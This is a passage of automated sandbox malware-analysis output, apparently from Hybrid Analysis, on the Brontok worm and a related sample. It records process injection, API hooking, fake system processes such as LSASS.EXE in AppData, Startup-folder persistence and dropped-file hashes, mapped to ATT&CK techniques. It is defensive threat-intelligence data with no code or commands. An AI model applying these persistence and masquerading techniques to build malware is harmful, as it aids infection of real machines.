\"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 608)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 376)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 376)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 376)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 376)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 376)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 376)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 376)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 376)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 376)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003924)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005152)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005184)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005260)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005816)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005376)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005912)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005888)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005396)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005696)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005820)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003336)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003160)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005692)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004340)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005748)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004240)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003700)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005652)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005480)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005040)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005280)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005364)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004332)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002384)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005864)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002416)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005740)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005488)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002760)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002512)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003492)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004016)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004444)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003136)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004472)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004184)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001200)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001812)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004536)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178
https://hybrid-analysis.com/sample/0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178
Hybrid Analysis - Killers
{"size": 93819, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "av_detect": 87, "vx_family": "Worm.Brontok", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 139, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 93819, "sha256": "39c882caf8b93ce45b3362df42ec4da936cbdbc8ff52a41b7bbe32a7a28b9713", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 93819, "sha256": "38546eba9b3465423f53a6a99b135c0ded397ba00b33eb90de8456c7f6dd4746", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 93819, "sha256": "b3637b33df9fc61add50a0a4ec28f3c3cf0825ae9c83a9ea7ee4ef9832633a0b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE", "file_size": 93819, "sha256": "73b1f21bff4f3434cb2904379f5c5b89277e2b94d04b00edabed5b9c705a4f57", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE", "file_size": 93819, "sha256": "1092c458f3ba56f0fb1072501d8a8dd52ada7c97e0fe77c044d758233ca4dd6e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE", "file_size": 93819, "sha256": "ca257a6476f5d0d3c08cc5f1ff8d1afa7486862254df84beab459c8491668538", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "%WINDIR%\\4k51k4.exe", "file_size": 93819, "sha256": "7c15b5f74effea3c60dffd692b616490db67d6195cf4486f50fbe102f8318eeb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%WINDIR%\\System32\\IExplorer.exe", "file_size": 93819, "sha256": "2ee9ed9dc906dec9f48a6fe70d06b4cc5a69182188d1c86dbd99203a6385e766", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrHelloween.scr", "file_path": "%WINDIR%\\System32\\MrHelloween.scr", "file_size": 93819, "sha256": "bbc07b165c1fd1a6976335ca4b746d7dd458dcbfbccb134eb9d503c1df202de6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_path": "%WINDIR%\\System32\\shell.exe", "file_size": 93819, "sha256": "497ec76afde57c5e07ab5beab8bd6405e281293bf6b88ec62a066d246b6e6b9e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "C:\\4k51k4.exe", "file_size": 93819, "sha256": "73e22a1fe0836844932b9f190febabdff27118987dc7d7ea00a46e11bceab9fe", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Puisi.txt", "file_path": "C:\\Puisi.txt", "file_size": 442, "sha256": "660ecfcd91ba19959d0c348724da95d7fd6dd57359898e6e3bcce600ff3c797d", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services.exe", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS .exe", "file_size": 93819, "sha256": "b621d37a4fc053c6e6453393439f1ca75347881f60189fb425870ba76863d960", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 93819, "sha256": "9314dff586730b4e56a97c0ec8005a513464416c1d4b2d5c711be3e9491f7f4d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 93819, "sha256": "2c559eaa67f9047342d319692dac57066024c76696ad1cae55fc5d5b8bdb0bdb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 93819, "sha256": "ca257a6476f5d0d3c08cc5f1ff8d1afa7486862254df84beab459c8491668538", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 93819, "sha256": "38546eba9b3465423f53a6a99b135c0ded397ba00b33eb90de8456c7f6dd4746", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C388.bin", "file_size": 93819, "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C38B.bin", "file_size": 93819, "sha256": "ab1130d00f52368220c28b1b95d133932b3ba3d293d8b5465615c8885f422b11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9DA9B.bin", "file_size": 93819, "sha256": "1afb95180af7523ede67b960d02e47cb78cd70f781ead8d8c897d4a2568f5cc0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "smss.exe", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9DB78.bin", "file_size": 93819, "sha256": "2ee9ed9dc906dec9f48a6fe70d06b4cc5a69182188d1c86dbd99203a6385e766", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 93819, "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "SMSS.EXE (PID: 1600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9DB2A.bin", "file_size": 93819, "sha256": "7c15b5f74effea3c60dffd692b616490db67d6195cf4486f50fbe102f8318eeb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005240", "name": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe", "normalized_path": "C:\\0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178.exe", "sha256": "0cf00ab454e42aa2c448943e2253397c226f12b889985775b3dbe04578c87178"}, {"uid": "00000000-00005188", "parentuid": "00000000-00005240", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "b3393b309d2d0acaa15df331542b3b90423cc78e970d81d88feb42c8ca3ceb6b"}, {"uid": "00000000-00002712", "parentuid": "00000000-00005188", "name": "4k51k4.exe", "normalized_path": 